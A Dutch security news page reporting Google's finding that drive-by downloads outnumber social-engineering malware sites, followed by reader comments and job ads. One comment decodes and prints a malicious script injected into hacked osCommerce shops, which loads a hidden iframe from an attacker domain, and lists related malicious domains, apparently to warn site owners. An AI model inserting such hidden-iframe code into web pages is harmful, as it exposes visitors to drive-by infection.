Google: Drive-by download gevaarlijkste online dreiging
Niet het verleiden van internetgebruikers om zelf malware te installeren, maar ongepatchte software waardoor websites automatisch computers kunnen infecteren, is de grootste bedreiging op internet, aldus Google dat daarmee lijnrecht tegenover Microsoft staat. De zoekgigant waarschuwt internetgebruikers via de Safe Browsing API, een blacklist die zowel Chrome als Firefox gebruiken.
Elke dag geeft deze API drie miljoen malware waarschuwingen aan vierhonderd miljoen gebruikers. Google heeft nu de ontwikkelingen van de afgelopen vier jaar in kaart gebracht, waarbij het vooral keek naar de technieken die malware-verspreiders toepassen om detectie te voorkomen. Daarbij concludeert de zoekgigant dat social engineering, waarbij malware zich als anti-virus product of browser plugin voordoet, helemaal niet zo gevaarlijk is als Microsoft en veel anti-virusbedrijven ons doen geloven.
Het aantal aanvallen dat social engineering toepast groeit, maar deze groei moet wel in het juiste perspectief gezien worden, zegt Niels Provos van het Google Security Team. Websites die op social engineering vertrouwen zouden voor slechts 2% van alle websites verantwoordelijk zijn die malware verspreiden.
Exploit
Veel vaker komen volgens Google drive-by download-aanvallen voor. Hierbij misbruikt een kwaadaardige of gehackte website een beveiligingslek in de browser of populaire plugin zoals Adobe Reader, Flash Player of Java. "Onze analyse van welke lekken actief worden misbruikt, laat zien dat criminelen snel naar nieuwe en betrouwbare exploits overstappen om detectie te voorkomen", aldus Provos.
De meeste lekken worden slechts een korte tijd gebruikt, totdat er een nieuw lek beschikbaar is. Een uitzondering hierop is het uit 2006 stammende MDAC-lek in Internet Explorer, dat in de meeste exploit-toolkits aanwezig is.
Onlangs kwam onderzoeksbureau NSS Labs nog met verschillende rapporten dat Internet Explorer de meeste social engineering-aanvallen tegenhoudt. Volgens zowel NSS als Microsoft vormt deze categorie de grootste bedreiging op het web. Eerdere rondvraag van Security.nl onder verschillende anti-virusbedrijven wees uit dat ook hier de opvatting heerst dat social engineering het gevaarlijkst is.
Kom ik uit bij een wazige chinese site, met 100 popups
De bovenste hit!
Stuur je een mailtje naar Google, hoor je noooit meer wat van
Google is rommel, gebruik het niet
Ze willen alleen je geld hebben
Gebruik www.bing.com
Bijv. in webpages van gecompromitteerde osCommerce websites (nog steeds zeer veel) zie ik nu veel:
44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,
[knip]
7-h,7-h,123-h));
[/code]Ik snap er eerlijk gezegd geen barst van hoe dit werkt (ik ben geen JS expert) maar als ik de "n-h" evalueer met h=-2 (zal wel uit "Object.prototype.tes=-2" komen), en ik voer de waardes aan de functie fromCharCode() (dat kan online op http://jdstiles.com/java/cct.html), dan wordt 7-h (==9) een tab, 103-h een "i" en 100-h een "f".
Als ik dat netjes formatteer (tabs weg, spaties erbij) dan zie ik:
if (document.getElementsByTagName('body')[0]){
iframer();
}
else {
document.write("<iframe src='http://mariko10.in/iframe.php?id=8xb7qdqtkp2s5d6ut86vd54e36upp2a'
width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');
f.setAttribute('src','http://mariko10.in/iframe.php?id=8xb7qdqtkp2s5d6ut86vd54e36upp2a');
f.style.visibility='hidden';
f.style.position='absolute';
f.style.left='0';
f.style.top='0';
f.setAttribute('width','10');
f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
Zoeken op "mariko10.in" levert http://ilion.blog47.fc2.com/blog-entry-304.html op (Chinees vermoed ik, mogelijk kwaadaardig) met daarin onder meer:
karamelka.ce.ms 2011-08-13
atrostiks5.ru 2011-08-12
solnechnozdes.ru 2011-08-10
marko3.in 2011-08-09 ?
jhgukn.com 2011-07-30
qoogledns.com 2011-07-27
liveinerinet.com 2011-07-27
yaho0dns.com 2011-07-27
yandexpics.com 2011-07-27
arhyv.ru 2011-07-20
rsdisp.ru 2011-07-16
yandekapi.com 2011-07-16
sfkdhjnsfjg.ru 2011-07-04 ?
googleadcence.com 2011-04-20
rsstatic.ru 2010-07-13
aacf.ru 2010-03-03
lamacom.net 2009-07-03
chrisalrussia.ru 2008-11-13
willysy.com Mass Injection ongoing, over 8 million infected pages, targets osCommerce sites (Armorize)
Naast de oorspronkelijke "primaire" sites willysy.com en exero.eu ben ik ook tegengekomen: 1see.ir, adorabletots.co.uk, tiasissi.com.br en dus nu lamacom.net; als je 1 of meer van voornoemde hostnames in bestanden op een osCommerce site tegenkomt zou ik daar geen gegevens aan toevertrouwen.
Ten slotte heeft Jürgen Schmidt (security specialist van het Duitstalige blad c't) een (Duitstalig) stukje geschreven over hoe osCommerce beheerders hun site kunnen fixen, zie http://www.heise.de/security/artikel/Schnellhilfe-fuer-osCommerce-Admins-1323536.html.
Deze posting is gelocked. Reageren is niet meer mogelijk.
Junior DevOps Engineer
Certified Secure is op zoek naar een Junior DevOps Engineer. Deze functie is een stuk interessanter dan de term doet vermoeden! Om jou als potentiële nieuwe collega meteen te laten zien wat we doen hebben we speciaal voor jou een selectie gemaakt van een aantal leuke security challenges. Are you ready for a challenge?
Cybersecurity Trainer / Streamer
Toe aan een nieuwe nieuwe job waarmee je het verschil maakt? In de Certified Secure trainingen laat je deelnemers zien hoe actuele kwetsbaarheden structureel verholpen worden. Ook werk je actief mee aan de ontwikkeling van onze gamified security challenges. Bij het maken van challenges kom je telkens nieuwe technieken tegen, van Flutter tot GraphQL, van Elastic Search tot Kubernetes.
